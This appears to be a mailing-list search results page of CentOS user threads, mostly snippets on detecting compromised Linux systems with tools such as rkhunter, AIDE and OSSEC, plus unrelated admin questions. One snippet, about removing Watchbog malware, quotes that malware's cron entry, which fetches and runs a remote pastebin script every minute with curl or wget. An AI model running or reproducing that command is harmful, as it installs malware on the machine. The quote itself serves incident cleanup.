similar to: how to know when a system is compromised

Displaying 20 results from an estimated 3000 matches similar to: "how to know when a system is compromised"

2019 Nov 14
2
how to know when a system is compromised
I have not, I'll look into that one, thanks! On 11/14/2019 9:48 AM, SternData wrote: > Do you run rkhunter? > > On 11/14/19 9:40 AM, Christopher Wensink wrote: >> How do you know when a Linux system has been compromised? >> >> Every day I watch our systems with all the typical tools, ps, top, who, >> I watch firewall / IPS logs, I have logwatch setup and
2019 Nov 14
0
how to know when a system is compromised
This is one where there's probably no limit to what you could do. We have a high-security environment and are using Aide and OSSEC. Aide has been good at reporting file system changes and is very granular, the dilemma is what to monitor and what to ignore (keep from being inundated with reports of innocuous changes at the risk of missing something). However, it is not daemon-based so
2019 Nov 14
2
how to know when a system is compromised
Once upon a time, Leroy Tennison <leroy at datavoiceint.com> said: > The executable could be placed on mounted read-only media That's not as secure as you think. Linux bind mounts can mount a file over another file (plus there's overlay filesystems), so it's possible to replace a binary even on a read-only device. -- Chris Adams <linux at cmadams.net>
2017 Nov 06
1
How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently I am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps, and it is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2019 Nov 14
0
how to know when a system is compromised
On 2019-11-14 10:01, Christopher Wensink wrote: > I have not, I'll look into that one, thanks! > > On 11/14/2019 9:48 AM, SternData wrote: >> Do you run rkhunter? >> >> On 11/14/19 9:40 AM, Christopher Wensink wrote: >>> How do you know when a Linux system has been compromised? I'm sure you have followed the procedure how to install system and
2019 Nov 14
0
how to know when a system is compromised
Do you run rkhunter? On 11/14/19 9:40 AM, Christopher Wensink wrote: > How do you know when a Linux system has been compromised? > > Every day I watch our systems with all the typical tools, ps, top, who, > I watch firewall / IPS logs, I have logwatch setup and mailing daily > summaries to me and I dive deeper into logs if something looks suspicious. > > What am I missing
2020 Jul 01
4
[OT] Bacula offsite replication
Hi Leroy, How can I confirm that corruption is not encountered during the rsync transfer? Thank you in advance. On 01/07/20 16:04, Leroy Tennison wrote: > I've used rsync (but probably not for the size you're referring to), it works and has enough features to meet most needs. I have had a single situation where corruption occurred during transfer (a few times, have no idea why),
2017 Nov 06
2
How to detect botnet user on the server ?
Hello guys, What is the best way to identify a possible user using a botnet with PHP on the server? And if he is using GET commands, for example, on another server. Does Apache log outbound connections? If it is using a file that is not malicious, ClamAV would not identify it. Thanks
2019 Oct 12
1
easy way to stop old ssl's
Without context it's impossible to make firm statements but, having gone through this a while back (and discovering that less than 1 percent of an examined list of connections couldn't support current ssl - mainly Apple hardware), who do you want to protect? Is it the minority who won't/can't upgrade or the majority who have? And, do you have to protect yourself from liability
2020 Jul 08
6
USB-serial adapter for CentOS 7
I need to connect an older APS UPS unit to a machine running CentOS 7. Unfortunately the UPS only has a serial port whereas the computer does not. I am aware that there are USB-serial adapters but that the hardware or the drivers might fall short of expectations. Does anyone have positive experience with such an adapter? Or, conversely, would recommend avoiding a particular adapter?
2020 Jul 01
2
[OT] Bacula offsite replication
Hi everyone, I have updated my backup server to CentOS 8.2. It runs bacula performing backup on disks. I would like to replicate backups on another offsite machine. I read about the ability to configure a new storage daemon in the offsite location and create a Migration/Copy Jobs. If I'm not wrong, it replicates only volumes but not replicate the catalog. I will try this. Another way to
2019 Nov 04
3
Limit user password by time
Is it possible with "chage" to configure a password caducity for, at most, 2 hours? I think "chage" only allows caducity for, at least, one day.
2020 Jul 08
3
USB-serial adapter for CentOS 7
On 2020-07-08 10:23, Leroy Tennison wrote: > I've used one on a Linux laptop, it "just worked" but the OS wasn't CentOS 7. > It is not clear if you used USB from APC UPS to USB port on the machine side or USB - to - "serial". USB to USB with standard USB cable will work. If one uses serial to USB adapter on the machine side (to create serial port through USB
2020 Jun 27
2
HP vs. Brother Printers: Use with Centos/Fedora
On Sat, 2020-06-27 at 15:44 -0600, Frank Cox wrote: > On Sat, 27 Jun 2020 17:33:39 -0400 > Jay Hart wrote: >> If you had to rate which printer brand works better with Linux >> (Fedora and >> Centos), what would it be? > Any Brother printer that I've ever had the misfortune to have to deal > with either didn't work at all or if it could be made
2020 Jul 02
5
[OT] Bacula offsite replication
On 01/07/20 17:13, Leroy Tennison wrote: > I realize this shouldn't happen, the file is a tgz and isn't being modified while being transmitted. This has happened maybe three times this year and unfortunately I've just had to deal with it rather than invest the time to do the research. > > > Harriscomputer > > Leroy Tennison > Network Information/Cyber
2020 Mar 25
4
Need help to fix bug in rsync
> On Wed, 2020-03-25 at 14:39 +0000, Leroy Tennison wrote: >> Since you state that using -z is almost always a bad idea, could you >> provide the rationale for that? I must be missing something. >> > I think the "rationale" is that at some point the > compression/decompression takes longer than the time reduction from > sending a compressed file. It
2019 May 23
2
Bash completion thrown by quoted option args?
There was a thread about C7 bash completion back in August last year, but it doesn't have answers for this problem. Example: "yum install /path/to/local/package" works fine with tab completion to fill in the path and package bits. However, "yum --debuglevel="1" install ..." just gets stuck and doesn't offer anything. The only option is to type everything
2020 Apr 02
2
CentOS 7 host with guests as bridge cannot access host
This is unfortunate. https://wiki.libvirt.org/page/TroubleshootMacvtapHostFail To the "normal" user - BRIDGE means guest is on the same network and has access to the host. Bummer. Jerry
2020 Apr 02
2
Upgraded to 7.10 from 6...
Let me start out by making clear I *LOATHE* gnome, ok? So I don't want to hear about it. What's happening is this: I did this: yum groupinstall "Development and Creative Workstation" yum groupinstall "KDE Plasma Workspaces" Now, when I go in graphical mode, I try to change to kde on login. Nope - minutes later, I can see a cursor, and a gray screen. Ditto on the